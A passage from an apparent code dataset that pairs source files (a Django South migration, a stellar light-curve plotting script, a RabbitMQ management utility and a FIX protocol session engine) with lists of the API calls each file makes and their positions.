        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'core.product': {
            'Meta': {'ordering': "['name']", 'object_name': 'Product'},
            'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 558711)'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'has_team': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 558895)'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'own_team': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'core.productversion': {
            'Meta': {'ordering': "['product', 'order']", 'object_name': 'ProductVersion'},
            'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 559819)'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'environments': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'productversion'", 'symmetrical': 'False', 'to': "orm['environments.Environment']"}),
            'has_team': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'latest': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 560004)'}),
            'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'own_team': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'}),
            'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'versions'", 'to': "orm['core.Product']"}),
            'version': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'core.user': {
            'Meta': {'object_name': 'User', 'db_table': "'auth_user'", '_ormbases': ['auth.User'], 'proxy': 'True'}
        },
        'environments.category': {
            'Meta': {'ordering': "['name']", 'object_name': 'Category'},
            'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 562776)'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 562967)'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'environments.element': {
            'Meta': {'ordering': "['name']", 'object_name': 'Element'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'elements'", 'to': "orm['environments.Category']"}),
            'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 561818)'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 562003)'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'environments.environment': {
            'Meta': {'object_name': 'Environment'},
            'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 555711)'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'elements': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'environments'", 'symmetrical': 'False', 'to': "orm['environments.Element']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 555910)'}),
            'profile': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'environments'", 'null': 'True', 'to': "orm['environments.Profile']"})
        },
        'environments.profile': {
            'Meta': {'object_name': 'Profile'},
            'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 557817)'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
            'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 558002)'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        }
    }

    complete_apps = ['core']
| [
"south.db.db.delete_column"
] | [((652, 705), 'south.db.db.delete_column', 'db.delete_column', (['"""core_productversion"""', '"""cc_version"""'], {}), "('core_productversion', 'cc_version')\n", (668, 705), False, 'from south.db import db\n'), ((761, 807), 'south.db.db.delete_column', 'db.delete_column', (['"""core_product"""', '"""cc_version"""'], {}), "('core_product', 'cc_version')\n", (777, 807), False, 'from south.db import db\n')] |
import matplotlib.pyplot as pl
import os
import numpy as np
from ticle.data.dataHandler import normalizeData,load_file
from ticle.analysis.analysis import get_phases,normalize_phase
# Global plot styling for all figures produced below.
pl.rc('xtick', labelsize='x-small')
pl.rc('ytick', labelsize='x-small')
pl.rc('font', family='serif')
pl.rcParams.update({'font.size': 20})

path = os.getcwd()
phase_dir = f"{path}/results/phase_plots"
# exist_ok=True replaces the previous try/except FileExistsError dance.
os.makedirs(phase_dir, exist_ok=True)

data_dir = f"{path}/data/"
data_list_file = f"{data_dir}/dataList.txt"
data_list = np.loadtxt(data_list_file)

for data in data_list:
    # Star id is zero-padded with a single leading "0" (matches on-disk layout).
    star = f"0{int(data[0])}"
    file_name = f"{data_dir}/{star}/{star}_LC_destepped.txt"
    res_dir = f"{phase_dir}/{star}"
    os.makedirs(res_dir, exist_ok=True)

    t_series = load_file(file_name)
    t_series = normalizeData(t_series)
    # Two runs per star: the literature period (data[2]) and our result (data[1]).
    p = [(f"Phaseplot {star} - literature", "literature", data[2]),
         (f"Phaseplot {star} - P={data[1]} days", "result", data[1])]

    for title, save_text, period in p:
        masks = get_phases(t_series, period)

        # Phase-folded plot: one curve per phase mask.
        fig_phase = pl.figure(figsize=(10, 7))
        for i in masks:
            plot_data = normalize_phase(np.array((t_series[0][i], t_series[1][i])))
            pl.plot(plot_data[0], plot_data[1], linewidth=1)
        pl.xlabel("Phase")
        pl.ylabel("Flux")
        pl.title(title)
        # tight_layout must be applied per figure; the old module-level call
        # before any figure existed was a no-op.
        fig_phase.tight_layout()
        fig_phase.savefig(f"{res_dir}/{star}_{save_text}_phase_.pdf")
        pl.close(fig_phase)  # release figure memory (loop runs for many stars)

        # Raw light curve for the same period split.
        fig_lightcurve = pl.figure(figsize=(10, 7))
        for i in masks:
            pl.plot(t_series[0][i], t_series[1][i], linewidth=1)
        pl.xlabel("Period(days)")
        pl.ylabel("Flux")
        pl.title(f"{star} Lightcurve {save_text}")
        fig_lightcurve.tight_layout()
        fig_lightcurve.savefig(f"{res_dir}/{star}_{save_text}_lightcurve.pdf")
        pl.close(fig_lightcurve)
"os.makedirs",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"ticle.data.dataHandler.load_file",
"os.getcwd",
"ticle.data.dataHandler.normalizeData",
"matplotlib.pyplot.rcParams.update",
"matplotlib.pyplot.figure",
"ticle.analysis.analysis.get_phases",
"numpy.... | [((184, 219), 'matplotlib.pyplot.rc', 'pl.rc', (['"""xtick"""'], {'labelsize': '"""x-small"""'}), "('xtick', labelsize='x-small')\n", (189, 219), True, 'import matplotlib.pyplot as pl\n'), ((220, 255), 'matplotlib.pyplot.rc', 'pl.rc', (['"""ytick"""'], {'labelsize': '"""x-small"""'}), "('ytick', labelsize='x-small')\n", (225, 255), True, 'import matplotlib.pyplot as pl\n'), ((256, 285), 'matplotlib.pyplot.rc', 'pl.rc', (['"""font"""'], {'family': '"""serif"""'}), "('font', family='serif')\n", (261, 285), True, 'import matplotlib.pyplot as pl\n'), ((286, 323), 'matplotlib.pyplot.rcParams.update', 'pl.rcParams.update', (["{'font.size': 20}"], {}), "({'font.size': 20})\n", (304, 323), True, 'import matplotlib.pyplot as pl\n'), ((324, 341), 'matplotlib.pyplot.tight_layout', 'pl.tight_layout', ([], {}), '()\n', (339, 341), True, 'import matplotlib.pyplot as pl\n'), ((350, 361), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (359, 361), False, 'import os\n'), ((554, 580), 'numpy.loadtxt', 'np.loadtxt', (['data_list_file'], {}), '(data_list_file)\n', (564, 580), True, 'import numpy as np\n'), ((414, 436), 'os.makedirs', 'os.makedirs', (['phase_dir'], {}), '(phase_dir)\n', (425, 436), False, 'import os\n'), ((825, 845), 'ticle.data.dataHandler.load_file', 'load_file', (['file_name'], {}), '(file_name)\n', (834, 845), False, 'from ticle.data.dataHandler import normalizeData, load_file\n'), ((861, 884), 'ticle.data.dataHandler.normalizeData', 'normalizeData', (['t_series'], {}), '(t_series)\n', (874, 884), False, 'from ticle.data.dataHandler import normalizeData, load_file\n'), ((750, 767), 'os.mkdir', 'os.mkdir', (['res_dir'], {}), '(res_dir)\n', (758, 767), False, 'import os\n'), ((1076, 1104), 'ticle.analysis.analysis.get_phases', 'get_phases', (['t_series', 'period'], {}), '(t_series, period)\n', (1086, 1104), False, 'from ticle.analysis.analysis import get_phases, normalize_phase\n'), ((1125, 1151), 'matplotlib.pyplot.figure', 'pl.figure', ([], {'figsize': 
'(10, 7)'}), '(figsize=(10, 7))\n', (1134, 1151), True, 'import matplotlib.pyplot as pl\n'), ((1329, 1347), 'matplotlib.pyplot.xlabel', 'pl.xlabel', (['"""Phase"""'], {}), "('Phase')\n", (1338, 1347), True, 'import matplotlib.pyplot as pl\n'), ((1356, 1373), 'matplotlib.pyplot.ylabel', 'pl.ylabel', (['"""Flux"""'], {}), "('Flux')\n", (1365, 1373), True, 'import matplotlib.pyplot as pl\n'), ((1382, 1397), 'matplotlib.pyplot.title', 'pl.title', (['title'], {}), '(title)\n', (1390, 1397), True, 'import matplotlib.pyplot as pl\n'), ((1494, 1520), 'matplotlib.pyplot.figure', 'pl.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (1503, 1520), True, 'import matplotlib.pyplot as pl\n'), ((1619, 1644), 'matplotlib.pyplot.xlabel', 'pl.xlabel', (['"""Period(days)"""'], {}), "('Period(days)')\n", (1628, 1644), True, 'import matplotlib.pyplot as pl\n'), ((1653, 1670), 'matplotlib.pyplot.ylabel', 'pl.ylabel', (['"""Flux"""'], {}), "('Flux')\n", (1662, 1670), True, 'import matplotlib.pyplot as pl\n'), ((1679, 1721), 'matplotlib.pyplot.title', 'pl.title', (['f"""{star} Lightcurve {save_text}"""'], {}), "(f'{star} Lightcurve {save_text}')\n", (1687, 1721), True, 'import matplotlib.pyplot as pl\n'), ((1271, 1319), 'matplotlib.pyplot.plot', 'pl.plot', (['plot_data[0]', 'plot_data[1]'], {'linewidth': '(1)'}), '(plot_data[0], plot_data[1], linewidth=1)\n', (1278, 1319), True, 'import matplotlib.pyplot as pl\n'), ((1557, 1609), 'matplotlib.pyplot.plot', 'pl.plot', (['t_series[0][i]', 't_series[1][i]'], {'linewidth': '(1)'}), '(t_series[0][i], t_series[1][i], linewidth=1)\n', (1564, 1609), True, 'import matplotlib.pyplot as pl\n'), ((1216, 1258), 'numpy.array', 'np.array', (['(t_series[0][i], t_series[1][i])'], {}), '((t_series[0][i], t_series[1][i]))\n', (1224, 1258), True, 'import numpy as np\n')] |
#!/usr/bin/python
import shlex
import simplejson
from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE
class RabbitManagementUtil(object):
    """Utility wrapper around the RabbitMQ management plugin REST API
    (via rabbitmqadmin) for declaring, listing and deleting broker objects."""

    def __init__(self, config, options=None, sysname=None):
        """
        Given a config object (system CFG or rabbit mgmt config), extracts the correct config
        and prepares util for subsequent calls to RabbitMQ via management plugin REST API.
        """
        self.mgmt_cfg = self.get_mgmt_config(config, sysname)
        self.connect_str = self.build_connect_str(self.mgmt_cfg)
        self.options = options
        self.sysname = sysname
        self.call_args = self.connect_str
        if self.options:
            self.call_args += "_" + self.options
        self.parser = make_parser()

    @staticmethod
    def get_mgmt_config(config, sysname=None):
        """ Returns the RabbitMq management config dict from indirect reference in container CFG
        or from given config dict. """
        if not config:
            raise RuntimeError("Bad config argument")
        if "container" in config and hasattr(config, "get_safe"):
            # Container CFG: follow the indirect server reference.
            mgmt_cfg_key = config.get_safe("container.messaging.management.server", "rabbit_manage")
            mgmt_cfg = config.get_safe("server." + mgmt_cfg_key)
        elif "host" in config:
            mgmt_cfg = config
        else:
            raise RuntimeError("Bad RabbitMQ management config")

        sysname = sysname or "scioncc"
        # Work on a copy and fill in defaults for any missing/falsy values.
        mgmt_cfg = mgmt_cfg.copy()
        mgmt_cfg["host"] = mgmt_cfg.get("host", None) or "localhost"
        mgmt_cfg["port"] = mgmt_cfg.get("port", None) or "15672"
        mgmt_cfg["username"] = mgmt_cfg.get("username", None) or "guest"
        mgmt_cfg["password"] = mgmt_cfg.get("password", None) or "<PASSWORD>"
        mgmt_cfg["vhost"] = mgmt_cfg.get("vhost", None) or "/"
        mgmt_cfg["system_exchange"] = mgmt_cfg.get("system_exchange", None)
        if not mgmt_cfg["system_exchange"] and "exchange" in config and hasattr(config, "get_safe"):
            mgmt_cfg["system_exchange"] = "%s.%s" % (sysname, config.get_safe('exchange.core.system_xs', 'system'))
        mgmt_cfg["events_xp"] = mgmt_cfg.get("events_xp", None)
        if not mgmt_cfg["events_xp"] and "exchange" in config and hasattr(config, "get_safe"):
            mgmt_cfg["events_xp"] = "%s.%s" % (mgmt_cfg["system_exchange"], config.get_safe('exchange.core.events', 'events'))
        return mgmt_cfg

    @staticmethod
    def build_connect_str(mgmt_cfg):
        """Build the rabbitmqadmin connection argument string from a mgmt config dict."""
        connect_str = "-q -H {0} -P {1} -u {2} -p {3} -V {4}".format(
            mgmt_cfg["host"], mgmt_cfg["port"], mgmt_cfg["username"], mgmt_cfg["password"], mgmt_cfg["vhost"])
        return connect_str

    @staticmethod
    def get_mgmt_url(config, feats=None):
        """Return the management REST API base URL, optionally extended by path features."""
        mgmt_cfg = RabbitManagementUtil.get_mgmt_config(config)
        feats = feats or []
        url = "http://%s:%s/api/%s" % (mgmt_cfg["host"], mgmt_cfg["port"], "/".join(feats))
        return url

    # -------------------------------------------------------------------------
    # Util methods

    def clean_by_prefix(self, prefix):
        """
        Utility method to clean (sysname) prefixed exchanges and queues on a broker.
        @param prefix The sysname / prefix to use to select exchanges and queues to delete.
                      Must be the prefix to the exchange or queue or this will not be deleted.
        @returns A 2-tuple of (list of exchanges deleted, list of queues deleted).
        """
        exchanges = self.list_names('exchanges')
        deleted_exchanges = self.delete_names_with_prefix('exchange', exchanges, prefix)
        queues = self.list_names('queues')
        deleted_queues = self.delete_names_with_prefix('queue', queues, prefix)
        return deleted_exchanges, deleted_queues

    def clean_by_sysname(self, sysname=None):
        """Clean exchanges/queues prefixed by the given (or instance) sysname."""
        sysname = sysname or self.sysname
        if not sysname:
            raise RuntimeError("Must provide sysname")
        return self.clean_by_prefix(sysname)

    def _exchange_name(self, xp):
        # Events go to the dedicated events exchange; everything else uses
        # the system exchange.
        if xp == "events":
            return self.mgmt_cfg["events_xp"]
        return self.mgmt_cfg["system_exchange"]

    def _qualified_queue_name(self, ex_name, queue_name):
        # Queue names get prefixed with the exchange name unless they are
        # already sysname-qualified.
        if queue_name.startswith(self.sysname):
            return queue_name
        return ".".join([ex_name, queue_name])

    def _invoke_declare(self, cmd_str):
        # Parse a rabbitmqadmin command line and execute its declare action.
        (options, args) = self.parser.parse_args(shlex.split(cmd_str))
        mgmt = Management(options, args[1:])
        mgmt.invoke_declare()

    def declare_exchange(self, xp):
        """Declare the (topic, auto-delete) exchange backing the given xp."""
        ex_name = self._exchange_name(xp)
        cmd_str = '{0} declare exchange name="{1}" durable=false auto_delete=true type=topic'.format(self.call_args, ex_name)
        self._invoke_declare(cmd_str)

    def declare_queue(self, xp, queue_name):
        """Declare a durable=false, non-auto-delete queue on the given xp."""
        ex_name = self._exchange_name(xp)
        qqueue_name = self._qualified_queue_name(ex_name, queue_name)
        cmd_str = '{0} declare queue name="{1}" durable=false auto_delete=false'.format(self.call_args, qqueue_name)
        self._invoke_declare(cmd_str)

    def bind_queue(self, xp, queue_name, binding):
        """Bind a queue to the xp's exchange with the given routing key."""
        ex_name = self._exchange_name(xp)
        qqueue_name = self._qualified_queue_name(ex_name, queue_name)
        cmd_str = '{0} declare binding source="{1}" destination="{2}" destination_type=queue routing_key="{3}"'.format(
            self.call_args, ex_name, qqueue_name, binding)
        self._invoke_declare(cmd_str)

    # TODO: Move the management calls from pyon.ion.exchange here

    # -------------------------------------------------------------------------
    # Helpers

    def list_names(self, listable_type):
        """List broker objects of the given type; returns the parsed JSON list."""
        list_str = '%s list %s name' % (self.call_args, listable_type)
        (options, args) = self.parser.parse_args(shlex.split(list_str))
        mgmt = Management(options, args[1:])
        uri = mgmt.list_show_uri(LISTABLE, 'list', mgmt.args[1:])
        output_json = mgmt.get(uri)
        listables = simplejson.loads(output_json)
        return listables

    def list_names_with_prefix(self, listables, name_prefix):
        """Filter a listables result down to the names starting with name_prefix."""
        return [l['name'] for l in listables if l['name'].startswith(name_prefix)]

    # This function works on exchange, queue, vhost, user
    def delete_names_with_prefix(self, deletable_type, deleteable, name_prefix):
        """Delete all given objects whose name starts with name_prefix; returns deleted names."""
        deleted = []
        for d in deleteable:
            try:
                if d['name'].startswith(name_prefix):
                    delete_cmd = '%s delete %s name="%s"' % (self.call_args, deletable_type, d['name'])
                    (options, args) = self.parser.parse_args(shlex.split(delete_cmd))
                    mgmt = Management(options, args[1:])
                    mgmt.invoke_delete()
                    deleted.append(d['name'])
            except KeyError:
                # Some entries have no key 'name'
                pass
        return deleted
| [
"shlex.split",
"putil.rabbitmq.rabbitmqadmin.make_parser",
"simplejson.loads",
"putil.rabbitmq.rabbitmqadmin.Management"
] | [((773, 786), 'putil.rabbitmq.rabbitmqadmin.make_parser', 'make_parser', ([], {}), '()\n', (784, 786), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((4489, 4518), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (4499, 4518), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((5102, 5131), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (5112, 5131), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((5787, 5816), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (5797, 5816), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((6209, 6238), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (6219, 6238), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((6361, 6390), 'simplejson.loads', 'simplejson.loads', (['output_json'], {}), '(output_json)\n', (6377, 6390), False, 'import simplejson\n'), ((4452, 4472), 'shlex.split', 'shlex.split', (['cmd_str'], {}), '(cmd_str)\n', (4463, 4472), False, 'import shlex\n'), ((5065, 5085), 'shlex.split', 'shlex.split', (['cmd_str'], {}), '(cmd_str)\n', (5076, 5085), False, 'import shlex\n'), ((5750, 5770), 'shlex.split', 'shlex.split', (['cmd_str'], {}), '(cmd_str)\n', (5761, 5770), False, 'import shlex\n'), ((6171, 6192), 'shlex.split', 'shlex.split', (['list_str'], {}), '(list_str)\n', (6182, 6192), False, 'import shlex\n'), ((7041, 7070), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (7051, 7070), False, 'from putil.rabbitmq.rabbitmqadmin import Management, 
make_parser, LISTABLE, DELETABLE\n'), ((6989, 7012), 'shlex.split', 'shlex.split', (['delete_cmd'], {}), '(delete_cmd)\n', (7000, 7012), False, 'import shlex\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
ExchangeConnector fixEngine
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import asyncio
import simplefix
import threading
import logging
import time
import sys
import configparser
from fixClientMessages import FixClientMessages
from connectionHandler import FIXConnectionHandler, SocketConnectionState
class FixEngine(FIXConnectionHandler):
    """FIX session engine: drives logon, heartbeats and session-level message
    handling on top of an already-open socket connection."""

    def __init__(self, config, reader, writer, messageListener):
        FIXConnectionHandler.__init__(self, config, reader, writer, messageListener)
        self._config = config
        self._logout = False
        self._engineLogger.info(f"Socket Connection Open to {config['SocketHost']}:{config['SocketPort']}")
        self.clientMessage = FixClientMessages(config['SenderCompID'], config['TargetCompID'], config['SenderPassword'], config['BeginString'], config.getint('HeartBeatInterval'))
        # Kick off the engine's main loop on the running event loop.
        asyncio.ensure_future(self._handleEngine())

    def getConnectionState(self):
        # Current SocketConnectionState (CONNECTED / LOGGED_IN / ...).
        return self._connectionState

    async def _sessionMessageHandler(self, message: simplefix.FixMessage) -> bool:
        """ Handle Session Message.

        Returns True when the message was consumed as a session-level message
        (logon, logout, heartbeat, test request, sequence reset), False otherwise.
        """
        assert isinstance(message, simplefix.FixMessage)
        # NEED TO ADD HANDLING OF BUSINESS REJECTS
        msgType = message.get(simplefix.TAG_MSGTYPE)
        if msgType == simplefix.MSGTYPE_LOGON:  # Handle logon
            if self._connectionState == SocketConnectionState.LOGGED_IN:
                self._engineLogger.warning(f"{self._config['SenderCompID']} already looged in -> Ignoring Login Request.")
            else:
                self._connectionState = SocketConnectionState.LOGGED_IN
                self._engineLogger.info(f"{self._config['SenderCompID']} session -> LOGON")
                # Adopt the heartbeat interval the server echoed back.
                self._config['HeartBeatInterval'] = str(message.get(simplefix.TAG_HEARTBTINT).decode())
            return True
        elif self._connectionState == SocketConnectionState.LOGGED_IN:
            if msgType == simplefix.MSGTYPE_TEST_REQUEST:  # Send test heartbeat when requested
                msg = self.clientMessage.sendHeartbeat()
                # Echo the test request id so the server can correlate the reply.
                msg.append_pair(simplefix.TAG_TESTREQID, message.get(simplefix.TAG_TESTREQID))
                await self.sendMessage(msg)
                return True
            elif msgType == simplefix.MSGTYPE_LOGOUT:  # Handle Logout
                self._connectionState = SocketConnectionState.LOGGED_OUT
                self._engineLogger.info(f"{self._config['SenderCompID']} session -> LOGOUT")
                self.handleClose()
                return True
            elif msgType == simplefix.MSGTYPE_HEARTBEAT:
                msg = self.clientMessage.sendHeartbeat()
                msg.append_pair(simplefix.TAG_TESTREQID, message.get(simplefix.TAG_TESTREQID))
                await self.sendMessage(msg)
                return True
            elif message.get(simplefix.TAG_RESETSEQNUMFLAG) == simplefix.RESETSEQNUMFLAG_YES:  # If ResetSeqNum = Y Then Reset sequence
                self._session.resetSeqNo()
                self._engineLogger.info("Resetting Sequence Number to 1")
                return True
            else:
                return False
        else:
            self._engineLogger.warning(f"Cannot process message. {self._config['SenderCompID']} is not logged in.")
            return False

    async def _handleEngine(self):
        # Main loop: log on, then alternate between reading messages and
        # checking the expected heartbeat until the socket disconnects.
        await self.logon()
        while self._connectionState != SocketConnectionState.DISCONNECTED:
            if self._connectionState != SocketConnectionState.LOGGED_OUT:
                await self.readMessage()
